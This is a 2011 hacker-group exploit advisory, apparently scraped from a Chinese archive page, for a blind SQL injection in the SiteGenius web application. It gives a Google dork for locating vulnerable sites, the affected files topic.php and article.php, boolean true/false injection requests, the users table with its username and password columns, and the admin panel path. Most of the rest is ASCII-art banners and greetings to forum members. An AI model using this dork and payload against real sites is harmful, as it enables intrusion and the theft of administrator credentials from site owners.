扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
===================================================== SiteGeniusBlind SQL injection vulnerability ===================================================== # Exploit title : SiteGenius Blind SQL injection vulnerability # Date : 02 \ 08 \ 2011 # Author : AutoRUN& dR.sqL # Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net,HackingWith.US , # Software Link : http://www.sitegenius.com # Tested on : Windows XP & Linux # Category : web apps # Google Dork : inurl:"sitegenius/topic.php?id=" # Versions affected : All ---------------------------------- #~ExpL0!taTi0N ~ # ---------------------------------- Affected files : topic.php & article.php SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php Exploit : http://localhost/sitegenius/topic.php?id=1 and 1=1--> TRUE http://localhost/sitegenius/topic.php?id=1 and 1=2--> FALSE w00t!! Blind SQL injection ! _ ______ _ _ ____ _ _____ / \_ _| |_ ___ |_ \| | | | \ | |( _ ) __| |_ \ _____ _| | / _ \| | | | __/ _ \| |_) | | | |\| |/ _ \/\/ _<code> | |_) | / __|/ _</code> | | / ___ \ |_| | |_ (_) |_ <| |_| | |\| | (_>< | (_| |_ < _\__ \ (_| | |___ /_/ \_\__,_|\__\___/|_| \_\\___/|_| \_|\___/\/\__,_|_| \_(_)___/\__, |_____| |_| # Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends. _____ ________ __ _ _ _ |_ \ _ __ ____ ___| | |___ \| __ ) / \| | |__ __ _ _ __ (_) __ _ _ __ | | | |_) | '__/ _ \| | | |/ _<code> | __) |_ \/ _ \ | | '_ \ / _</code> | '_ \| |/ _` | '_ \| | |__/| | | (_) | |_| | (_| |/ __/| |_) |/ ___ \| | |_) | (_| | | | | | (_| | | | | |_| |_| |_|\___/ \__,_|\__,_| |_____|____//_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_) # 2011 |
体验盒子
